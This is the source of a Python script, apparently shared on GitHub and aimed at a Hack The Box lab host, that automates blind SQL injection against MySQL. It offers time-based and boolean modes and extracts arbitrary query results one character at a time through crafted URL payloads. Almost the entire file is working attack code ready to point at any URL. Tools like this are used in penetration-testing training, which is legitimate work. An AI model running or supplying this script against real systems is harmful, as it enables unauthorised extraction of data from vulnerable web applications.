-
Notifications
You must be signed in to change notification settings - Fork 52
/
Copy pathblindSQLi.py
112 lines (97 loc) · 4.02 KB
/
blindSQLi.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
#!/usr/bin/python3
#by 21y4d
#Blind SQLi script for MySQL
#To adapt it to other DBMS, change the payloads in getQueryOutput()
import requests, time, urllib3
from termcolor import colored, cprint
from urllib.parse import quote
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = "https://www.test.htb/index.php?id=1" #CHANGE HERE
session = requests.Session()
initialTime = time.time()
output = ""
while True:
Method = input('SQLi type [T/B]: ') #T: Time-Based Blind SQLi, B: Boolean Blind SQLi
queryInput = input('SQL query: ')
if("*" not in queryInput):
break
print("Please specify a column name!")
if(Method == 'B'):
print("Using Boolean Blind SQL Injection")
defaultLength = int(session.get(url,verify=False).headers['Content-Length'])
else:
TIME = int(input('Sleep time (s) "High->slow, Low->inaccurate": ') or "3")
print("Using Time-Based Blind SQL Injection with %s (s) sleep time" % TIME)
time.sleep(1)
def colorPrintAttempt(Input):
global output
print("\033c")
cprint(output,'green')
cprint('[*] Trying: ' + Input, 'red')
def colorPrint():
global output
print("\033c")
cprint(output,'green')
time.sleep(1)
def getQueryOutput(query, rowNumber=0, count=False):
global TIME
flag = True
queryOutput = ""
tempQueryOutput = ""
if(count):
dictionary = "0123456789"
else:
dictionary = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
while flag:
flag = False
for j in range(1, 1000):
for i in range(0, len(dictionary)):
tempQueryOutput = queryOutput + dictionary[i]
colorPrintAttempt(tempQueryOutput)
if(Method == 'T'):
if(count):
payload = "' AND IF(MID((select count(*) from (%s) as totalCount),%s,1)='%s',SLEEP(%s),0)--+" % (query, str(j), quote(dictionary[i]), str(TIME))
print("\nGetting rows count...\n")
else:
payload = "' AND IF(MID((%s limit %s,1),%s,1)='%s',SLEEP(%s),0)--+" % (query, rowNumber, str(j), quote(dictionary[i]), str(TIME))
print("\nScanning row %s/%s...\n"%((rowNumber+1),totalRows))
fullurl = url+payload
startTime = time.time()
r = session.get(fullurl,verify=False)
elapsedTime = time.time() - startTime
if elapsedTime >= TIME:
flag = True
break
elif(Method == 'B'):
if(count):
payload = "' AND (MID((select count(*) from (%s) as totalCount),%s,1))!='%s'--+" % (query, str(j), quote(dictionary[i]))
print("\nGetting rows count...\n")
else:
payload = "' AND (MID((%s limit %s,1),%s,1))!='%s'--+" % (query, rowNumber, str(j), quote(dictionary[i]))
print("\nScanning row %s/%s...\n"%((rowNumber+1),totalRows))
fullurl = url+payload
r = session.get(url+payload,verify=False)
currentLength = int(r.headers['Content-Length'])
if(currentLength != defaultLength):
flag = True
break
flag = False
if flag:
queryOutput = tempQueryOutput
continue
break
return queryOutput
totalRows = int(getQueryOutput(queryInput,0,True))
output = "\nTotal rows: %s\n"%(totalRows)
colorPrint()
for i in range(0, totalRows):
currentOutput = getQueryOutput(queryInput,i)
output += '\n[+] Query output: ' + currentOutput
totalOutput = output +"\n"
colorPrint()
if(totalRows>1):
print('\n[+] All rows:\n')
output = totalOutput
colorPrint()
totalTime = int(time.time()-initialTime)
print("Total time: " + str(time.strftime('%H:%M:%S', time.gmtime(totalTime))) + " seconds!")